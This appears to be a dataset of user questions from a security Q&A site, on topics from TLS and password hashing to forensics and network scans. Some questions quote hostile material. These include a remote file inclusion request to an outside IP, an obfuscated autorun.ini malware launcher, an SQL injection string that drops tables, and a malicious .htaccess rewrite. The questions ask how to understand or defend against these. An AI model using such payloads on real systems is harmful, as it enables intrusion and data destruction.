instruction stringlengths 24 29.9k |
|---|
I'm a Security Student at Pennsylvania State University and I am considering taking FOR408 through SANS this summer in Pittsburgh (not far from my home). I really want this to help me stand out in my resume and plus I'm just interested. The cost is not an issue. As for my current skill level I spoke with my security pr... |
I need to be able to watch directories on our servers, and track changes to files as part of our audit compliance. I have adjusted auditd to watch the directories, and send all writes and attribute changes to syslog (which immediately forwards on to my splunk server)
this is helpful, it shows who changed a file, but d... |
I clearly understand that the security seals (verisign or norton secure etc.) shown on banking and other websites are generated using a script and available only after an ssl certificate is purchased and installed.
The certificate vendors say "the seal helps improve your customers' perception of safety and trust"
I jus... |
What is the reason for UNIX-like access permissions (both the traditional user-group-others and extended ACLs) being classified as a form of DAC (Discretionary Access Control) system and not MAC (Mandatory AC)?
What would be required for them to be considered being a MAC system?
|
Is it safe that sometimes my Anti-filtering program does not change the DNS address?
|
I saw that some e-commerce scripts can also run without ssl, but everyone recommends to activate it to protect sensitive data.
I just saw a site that has an e-shop link, if i click it my browser says that the security certificate is not reliable, and in fact if i click on "continue to the site" it switches to http.
Is ... |
I am trying to learn how a secure web application is developed. Particularly, I am unsure of how passwords are sent from the client to the server. For a typical user/password login form. If the client sends a plaintext user/pass in a POST request over HTTPS. Is this secure enough? Considering the server hashes the plai... |
Is there any tool to extract cookies from network sniffs generated by tcpdump (.pcap files).
I know I can open it in wireshark but it will take a while until I find the domain I am interested into and the cookies (is there a filter I can use ?)
Thanks
|
I'm almost certain this isn't possible, as it would probably be too exploitable, but I wanted to ask the community just in case.
Is there a way to determine and display the state of HTTPS on a page (working vs. not working) within the browser (i.e. as a status on a website somewhere), in addition to the lock icon prov... |
Is it possible - in theory - to stop1 a DDoS attack of any size? Many people claim it's impossible to stop DDoS attacks and tell me I just shouldn't mess with the wrong people on the internet.
But what if, in like 5 years, everyone is able to rent a botnet? Shouldn't we just re-think the whole internet architecture the... |
I have realized some time ago that we should not put the login/password for accessing a remote database server directly into a executable file because of the reverse engineering and memory decoding. I do not know if this is what everybody already do, but I prefer to first access some encrypted API with a key or phrase ... |
Background (not necessary to read):
I've used a few different major AV programs day-to-day over the years, and not one has ever informed me I was running code with known vulnerabilities.
Not only does this bother me since it leaves me open to direct attack from someone aware of those vulnerabilities, but it also means ... |
I want to use OpenSSL to create a CSR and submit it to my CA (which uses Microsoft PKI) and receive certificates that can be used for both Server Auth and Client Auth. I'm not clear on a couple of things, which may simply be a a link between keyUsage and nsCertType.
Is it enough for me to include in the CSR
keyUsage=... |
We have a program that is vulnerable to a one byte frame pointer overwrite. The stack is marked executable, the Linux machine has aslr disabled, stack cookies are disabled, and it's a little endian standard x86.
We may run:
buf[256];
for(int i=0; i <=256; i++)
buf[i] = argv[1][i];
However, I want to put my shellcod... |
There are other questions here enquiring about disabling FireWire ports reversibly via software or irreversibly via hardware (e.g. epoxy/desoldering).
I would like to know if there are any reversible hardware protection methods available; for instance, something similar to these USB port (b)locks: 1 2.
|
I am scanning browser extensions of Chrome and Firefox for vulnerabilities. Is there any tool which would help me do this?
|
I have heard of programatically difference b/w GET and POST in web applications. Asking in curiosity which is more secure, GET method or POST method in web applications, I expect answers in terms of protocols too (i.e in http and https)?
|
Someone in Hungary tried something odd recently:
/?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt?
This is the partial URL from my log, showing the page they went to. They gave my site's URL as the referrer.
What, if anything, would this kind of access do to a vulnerable server?
Thanks for any info.
|
Is it possible to get the username and password we enter into sites like facebook using proxy server?
The scenario is like this :
1.My laptop is connected to a network.
2.It is configured to use a proxy server to connect to Internet.
3.I enter my credentials into secure sites.
Is it possible for others to get creden... |
I have been reading about cross-subdomain cookie attacks here.
A quick overview of how it works (from Wikipedia):
A web site www.example.com hands out subdomains to untrusted third parties
One such party, Mallory, who now controls evil.example.com, lures Alice to her site
A visit to evil.example.com sets a session coo... |
I have a service that allows SSO via SAML2. When SAML2 is used, we delegate the entire authentication process to the Identity Provider.
We are considering adding OAuth in order to support some mobile applications. (We don't want the user to have to log in constantly.)
It's pretty obvious how it will all work together ... |
I have been interested in Information Security. I was recently introduced to the idea of hashing. What I currently understand about hashing is that it takes the password a user enters. Then it randomly generates a "hash" using a bunch of variables and scrambling everything. Then when you enter this password to log in i... |
I'm currently developing a mobile app (iOS based initially) that consumes multiple APIs. Currently we're storing API keys as strings in the the prefix header file, and initializing most of the APIs when the app loads. It's occurred to us that it is quite easy to extra the API keys from the executable on a rooted devi... |
In a system attempting to detect SYN scans, one technique is to analyze the rate of change of (network packets sent from victim host per second). Processes such as uploading a large file would not be "detected" as belonging to the SYN scan because the rate of change would remain constant. But when a SYN scan is happeni... |
during SYN scans, many small tcp packets are sent to multiple ports to determine which ports are open or not. But when you're streaming media, aren't you receiving many
One type of ID system, the Dendritic Cell Algoritithm is used to determine if SYN scans are occurring on a host. Now, one portion (out of 7) determine... |
I don't know if I used the term correctly but basically this is the scenario:
I am working at an application witch on every computer install must make a request to a server notifying the server that the app installed properly.The system I use currently has a checksum value that is calculated on client side and on serve... |
I'm confused on the case of SYN scan and closed ports (the case of open ports makes sense). So, the attacker sends a ~40 byte SYN packet, a "closed port" would send a RST packet back to the attacker and is thus "unexploitable". Does this mean that the attacker can't send another SYN packet to the closed port to continu... |
A large MNC with approximately 50,000 employees, and with offices in Asia, Europe and North America. This MNC operates its own PKI environment, with a self-signed Certificate Authority based at its head quarters in North America and Registration authorities distributed across the regions. Non- repudiation needs to be e... |
When I'm visiting a website on the public internet, the website can cause my browser to send requests to a local IP address (such as 10.0.0.1). This can be used to attack internal web sites, e.g., through
CSRF attacks.
Why do browsers allow this? If browsers prohibited this, would this increase security? If browsers... |
I have a bunch of SMSs in Chinese from a forensic extraction of a blackberry bold 9780 via Cellebrite UFED. While messages in English are clear-text readable (making me feel that this has nothing to do with encryption), I simply cannot represent these (Chinese) messages. It's obviously a problem with UFED's analysis s... |
Is there a smooth way to mark unsafe parts of a string? i.e. for use in SQL.
example in php:
someFunction("safe text" . $unsafeVariable . "safe text" . $anotherUnsafeVariable);
Is there a smooth way to know, in someFunction, what parts of the passed string that is unsafe?
I could send an array of strings where each str... |
I'm looking for implementations (or even wrappers) for OTR or SecureIM encrypted chat protocols usable from C#.
Currently I found none, and considering porting Java OTR library and/or wrapping SecureIM. But maybe I missed something?
|
I'm working on securing apps from malware attack in project. I just want to know how app is repackaged with malware. Because for reverse engg. we've apktool, dex2jar, Java decompiler. But how intruders change code in java and then repackage it. Because I think it is not possible to get jar to dex. Please help.
|
I used some vulnerability scanners to check a site of mine, and an instance of blind SQL injection was returned. However, when I try to exploit this vulnerability by entering the following into the address bar, nothing happens:
http://www.example.com/articles.php?id=-1' or 68 = '66; DROP ALL TABLES; --
I don't see why... |
I was humming along with my usual routine of listening to old Defcon videos trying to understand some of the basics of what's going on in the IT Security world, when I came across one explaining man in the middle attacks.
So I got to thinking. Well, what could you really do with that? Then I thought of an odd man in t... |
Intro
From XKCD #936: Short complex password, or long dictionary passphrase?,
After some search for a tool that generate random pass phrases, I've initiate my own...
Take already present dictionary on my desk: /usr/share/dict/american-english
and see:
wc -l /usr/share/dict/american-english
98569
After a quick look, I ... |
I have come across the need in my web app to store two values for each user. These values would need to be retrievable from a value stored in a URL. I would prefer to store neither of the values in plaintext.
I've been wondering if there would be a way to use a two-way encryption technique here where I would generate ... |
This is an openSSL command for generating a private key and a certificate,
openssl req -out CSR.csr -new -newkey rsa:2048 -nodes -keyout privateKey.key
The question I have is whether there is some way to run this command within an executable compiled from C?
|
I was able to sniff the EAP packets from the attacker machine with a wireless card on p-mode, however i was not able to sniff this data off the user using the same card under windows.
Wireshark, did not detect the card because it is external/USB. Microsoft network monitor in p-mode only shows the probe request and resp... |
I've been trying to design a simple archive format, that allows me to just bundle a bunch of encrypted files together.
The idea, I currently have is to embed not the encryption key but a truncated hash of the encryption key in the message.
I'm assuming that both the sender and receiver has already obtained the symmetri... |
I have installed Snort IDS and most alarm is:
"COMMUNITY SIP TCP/IP message flooding directed to SIP proxy"
And i use home DSL Internet connection , should i be worried about this alarm ?
I have read this article but i couldn't understand it completely?
I set firewall on my router and I've block WAN to LAN connections... |
I have a private (= I'm the only user) site at example.com/private/. Nothing else is published at this host (it's my domain).
I don't want anyone to know that there is anything at example.com, especially not my private site.
Now let's say Alice "guesses" the URL and visits example.com/private/. Of course I have protect... |
The question I have is simply how do I prevent a MiTM attack on a certificate once the server side creates a new one and tries to send it to a client? Does the certificate get encrypted by rsa and sent or...
|
I was thinking about correct horse battery staple. I am not a native English speaker. In my language, the above could be written as:
vqrno kon bateriq telbod OR
вярно кон батерия телбод.
Keep in mind that the Latin variant can have several variations, depending on how I choose to represent the sounds from my language w... |
I am trying to set up some hardened deployment settings for Java for the end-users' machines on my network.
I have my system wide deployment config and properties files set up:
%windir%\Sun\Java\Deployment\deployment.config (points to below file)
%windir%\Sun\Java\Deployment\deployment.properties
For purposes of this... |
I have just discovered that my workplace has enabled some new features in the Blue Coat network proxy. It seems like all HTTPS certificates in Chrome on Windows are being issued by this internal server. Under connection I only see: "The identity of this website has been verified by" this is an internal IP and not the "... |
I want to block torrent traffic on my network because it is utilizing too much bandwidth and disrupted my network traffic. What port range should I use and what protocol TCP or UDP?
|
Is compiled code more of a security risk than interpreted code? I'm under the impression that it is due to the fact that compiled code can hide malicious code from malware scans.
|
I am working on developing a secure authentication system with SSO. Until now I have been using the logging framework to generate logs that help in debugging the application. I wonder if there is a guideline to implement logging in a web application.
for example let us say there is an attack on the web app and a secur... |
TL;DR We are looking at opening port 3389 for a terminal server all the advice I’ve seen is that its suicidal but without good explanations as to why. Is it really that bad?
We are looking at setting up a terminal server for staff to access remotely. They are going to be using a bunch of devices including iPads, Androi... |
Recently I was asked to change a password, along with a password policy which reqires you to use a digit, a special character and a letter, but forbids any letter from you log in name to be used for the password, does this increase security? To my eyes, it shrinkens the set of available characters and therefore increas... |
a normal tcp packet shown in figure
How a TCP packet that causes dos attack different from normal Tcp Packet?
|
I discovered a file, named autorun.ini on my USB flash drive:
[AutoRun]
;FjYfoT
;jpId UagEbddsb PCjo
oPEn = efhcnu.exe
sheLl\open\DEfault=1
;utvDpsMqpT dDustbemW XyAy WeywFbvaVA eQnK
sHeLL\open\COmmanD = efhcnu.exe
;uRprWb
ShEll\expLore\coMmANd = efhcnu.exe
;kdtrelceNy uEeF gFTf
shEll\autoPLAy\commAND = efhcnu.exe
B... |
I am currently doing one of the Honeynet.org challenges, specifically the 13th forensic challenge dealing with steganography. Several PNGs have been provided and participants are to find and extract steganographically hidden messages from said files.
Since all files seemed to have been edited with paint.NET, I suspecte... |
Where I work, currently for internal sites, self signed certificates are being used.
In Firefox, the info regarding the certificate are displayed:
site domain: example.com
Owner: Site doesn't supply owner info
verified by: company name
I am curious as to how vulnerable self signed certificates are to a man in the mid... |
EDIT There have been upvotes retracted or downvotes due to, I think, a serious misunderstanding of my question. In the following I'm not concerned about the URL leading to a site containing malware or exploits (not that it's not a concern: it's simply not what this question is about): I'm concerned about injection in... |
There's been a lot of buzz around this recent CNN article about Shodan, a search engine that can find and allow access to unsecured internet-connected devices.
Shodan runs 24/7 and collects information on about 500 million connected devices and services each month.
It's stunning what can be found with a simple search ... |
In a conversation on twitter I warned a site about a security vulnerability. Specifically, the possibility of a MITM (Man in the Middle) attack used to compromise their registration form.
The response to my warning was that "We protect against man in the middle attacks. So still doesn't apply."
Is it possible to "prote... |
I have a dedicated server. There is no code/site live now, only a coming soon page. A few minutes ago I realized that someone has changed the .htaccess file.
How can I protect against that kind of attack?
The new htaccess contains these lines:
<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
... |
There are a lot of Best Practice documents that recommend having an offline Root CA and an Enterprise Subordinate CA that is signed by the root, for an internal Microsoft AD Certificate Services infrastructure.
I don't understand why having an offline root is recommended here. In the event that your subordinate CA is c... |
We're using an email sending service (fairly known) to send our emails. We made DNS changes so that emails going through them would pass SPF and DKIM.
A few days ago we noticed that they allow any account with them to send emails on behalf of domains that do not belong to that account. For example, let's say my domain... |
I know that when setting up VTP across switches in a network you should set a secret/password to prevent unauthorized requests. My question is I know that this uses an MD5 hash to ensure that attackers don't falsify any requests, but I haven't been able to find a decent explanation of how this hash is calculated. Is it... |
I am observing an issue in which the TLS handshake is failing between a Java Client and a web service hosted under IIS 7. Upon wiresharking the attempt it seems that the problem is the list of trusted authorities provided in the Certificate Request Frame does not include the Intermediate CA which signed the client cer... |
I want to hide any traffic an application makes on the local network, make it look like the network is completely quiet to the system and other monitoring software.
Is this doable? How would I achieve this?
|
I would like to allow local clients to access email via any of pop3, pop3s, imap, or imaps if they so choose but restrict remote clients to pop3s and imaps only, simililarly to how I already do for smtp using the postfix directive:
smtpd_recipient_restrictions =
permit_mynetworks,
permit_sasl_authenticated,
reject_unau... |
In another question about how to use OpenSSL programmatically a community member was writing, one suggestion was to use the system() command whereas another was to include the C headers and work with the library using functions directly. Also, if using system() is there a security benefit to using popen() or another f... |
This is a tricky issue I'm dealing with at the office. Management has a very... interesting concept of segregation of duties when it comes to traditional 3 tier applications.
I'm trying to figure out if this is an internal culture which grew out of a broken telephone game, or if it is part of some framework which I ha... |
I've noticed that some web-app security scanners flag the 'AutoComplete' feature of some websites (in the username/password fields) as a security risk and thus suggest including AutoComplete=off or in the code somewhere.
I've since learned that autocomplete is a non-standard attribute and apparently doesn't work in som... |
When a user has logged in to a system using their primary password, is there any value in asking for a distinct second password when performing sensitive functions?
Does it provide any benefit over asking for their primary password again?
I consider a second password to not be two factor authentication (2FA), but in w... |
I usually ask user for his username and password and run a query over database to return true or false, do you think it's secure enough? do you think it's better to add some steps to procedure?
|
Django (the Python web framework) escapes output to prevent XSS (Cross Site Scripting) attacks. It replaces ', ", <, >, & with their HTML safe versions.
However this presentation on slide share, (specifically slide № 13), says:
Problems
Any other Unicode will bypass this check
I can't understand this complaint. Is ... |
If I reveal the HMAC of encryption key, does it weaken the secrurity of the payload ?
e.g, I would construct following security packet
cipher: bf_cbc
IV: initialization vector to the cipher
key-md5: md5 of the encryption key
crypt-text: encrypted (md5(text) + text)
As above shown, does revealing of md5 (or some other... |
I am doing testing on some websites and I have found some serious bugs in those sites.
I am not sure if this is legal or not.
Is it ever legal?
How can I find out if it's legal where I live?
What can I do to ensure I'm legally protected?
|
It seems most security mechanisms nowadays default to a username + password combination for authorization. I want to know why there are 2 "keys," if you will. Won't one credential suffice?
Put differently, why can't I (or don't I) run a login form on a site using just one field, the secret password?
|
I'm looking for a definitive guide to the rules that determine a "strong" password for website authentication. It seems many websites have many different rules, and I'm not sure what is the best option for making users create strong, but still easy to remember passwords.
|
I'm taking a class on Cryptography and the professor mentioned that given mod N and base g with a certain order, you should pick powers m and n such that they create a certain property with the order of g. I wasn't completely sure of what he said and cant seem to find much info on it. I believe it was something along t... |
I have started to read more about ECDH/ECDHE and am wondering if it has the similary issues as RSA - i.e. the processing power required for the decryption of private key is more than of the public key.
If so, then are there are hardware accelerators available for these ciphers. I did not find them by a google search an... |
Every time I start Chrome there is the Snap.do page that seems to be set as the homepage no matter how many times I've changed the homepage settings on Chrome and I've removed Snap.do from extensions and it doesn't show up there any longer. A lot of forums said that I needed to delete the file via Control Panel first b... |
What are the tips for finding email spam sending scripts? I ask because usually I hit a wall in shared hosting environments, so I ask this question as a way to get some insight from others.
What I do:
Check RBL's for the IP and possibly get the time the IP was listed.
Go through transfer.logs and FTP logs looking for ... |
I'm trying to scan JavaScript files for vulnerabilities using JSHint. Specifically, I'm scanning the JavaScript files of browser extensions. To look for possible vulnerabilities I'm looking for bad JavaScript coding practices such as the use of eval. (JSHint has option to detect the use of eval.)
I'm currently scanning... |
I have a big drive with already data on it, that I would like to encrypt (ext4).
Is there a way to encrypt that disk without having to move the data to another drive first?
Or maybe, this would be the better solution, once that question is solved:
How do I create an auto-growing encrypted folder on linux?
|
Is a program compiled with the GCC -fstack-protector option and running in a Linux environment with the va_randomize_space kernel variable set to 1, totally protected against buffer overflow attacks?
If not, what is the common technique to produce a buffer overflow attack?
|
I have a problem I'm hoping someone could help with regarding the fingerprinting of the DBMS using sql injection, in a scripted/automated way to accurately and reliabling determine the DBMS.
I am in the process of writing an sql injection tool from scratch, but I am having problems finding a way/number of ways of finge... |
We are looking to mitigate BEAST (and similar) on our Cisco ACE appliance (running version A4(2.0)), which is the 'endpoint' for a handful of load-balanced services. Some of these service still run with SHA1-signed certificates (although we are working on having our clients test with SHA2-signed certs).
The ACE allows... |
I'm wondering if the two algorithms are similar and whether DSA was really just based off RSA?
Is DSA based on RSA and public key encryption?
If so how does DSA introduce signing and makes it different from RSA?
|
Say that we have a client / server solution (written in .NET). If we want to use a certificate for the TCP communication, is it enough to use one function/service certificate to encrypt communication both from client to server and from server to client? Or do I have to install one certificate for the client as well to ... |
As part of a school project I am trying to do a MITM attack on my local network using ARP poisoning. I choose a target and then I send a spoofed ARP packet to it and to the router every 100 milliseconds. The spoofed ARP packets are ARP responses, which are supposed to make the target believe I am the router and make th... |
After the reports of the SMS spoofing security issue Apple released a statement claiming that the iMessage system was 'secure' and should be used to prevent text spoofing. I have received several harassing SMS spoof text messages recently and yesterday I actually received one of the harassing messages via iMessage from... |
I've read http://alias.io/2010/01/store-passwords-safely-with-php-and-mysql/ on how to store passwords using PHP and MySQL, the secure way. Elbert says:
Use a cryptographically strong hashing function like SHA-1 or even SHA-256 (see PHP's hash() function).
Use a long and random salt for each password.
Use a slow hash... |
I am researching smartcards for corporate implementation and have hit a small bump. We need to support Windows RT, and Windows RT does not support Windows minidrivers for smartcards. Instead, it only supports PIV or GIDS compliant devices (cf. http://technet.microsoft.com/en-us/library/hh849637.aspx#BKMK_WinRTsupport).... |
What are good tools for finding CRLF injection vulnerabilities?
|
To what extent can the native file encryption provided by Microsoft Office 2013 (Word, Powerpoint, Excel, etc.) be relied upon to maintain the confidentiality of documents, especially within the context of a Windows OS?
It also appears as though encryption does not remove metadata, such as the file's date of creation o... |
I was reading a Computing security book1 and saw a question regarding database security and privacy. I can't quite figure out the answer, so I thought I will ask here.
One approach to ensure privacy is the small result rejection, in which the system rejects (returns no result from) any query, the result of which is d... |
Do the security experts at IT Security have a preference between the two cryptography courses offered by Coursera (Stanford), "Cryptography I" and Udacity, "Applied Cryptography"?
I am seeking an introductory-level course, and have a modest amount of experience with Java, macros, and CS in general.
|
I just purchased Badri L's Pro ASP.NET Web API Security in an attempt to learn the least-expensive means to securing my WebAPI, in terms of time-to-implement. I have zero experience with security and am looking for a solution that is "good enough" to get the app usable without sending plaintext over the wire.
The ap... |
ADS, or alternate data streams, were added in to Windows in 1993 (First Windows NT version) as a feature of the new NTFS file system to help support some features of the Mac OS at the time. I like to read about security stuff, and I recently read about how viruses, trojans, keyloggers, etc. like to hide using ADS becau... |
On a Linux-based server, I follow basic practices as below:
Make the admin account password long and complicated enough (i.e. theoretically speaking, password cannot be cracked within reasonable time).
Monitor all incoming network traffic to the administrative files.
To extend the layer of protection from #2 above, mo... |
I would like to know how really good is the content security policy header for preventing XSS considering the following :
Many sites have inline JS / CSS.
The request/ response headers can be modified in Transit.
|
Consider the following situation :
1. Somehow my boss's system got infected with a malware ( He visited one of the Java exploits website).
2. He sends a PDF document containing the requirement document of a new project coming up ( the malware infected this PDF).
My OS and antivirus are all patched. So the PDF will lo... |
I am a current user of gmail, and have recently become interested in the privacy policies of the large webmail providers like gmail, yahoo, hotmail etc. I understand that it is commonplace for them to use automated scanning to read emails, and this is something that I personally disagree with. Rather than rant about it... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.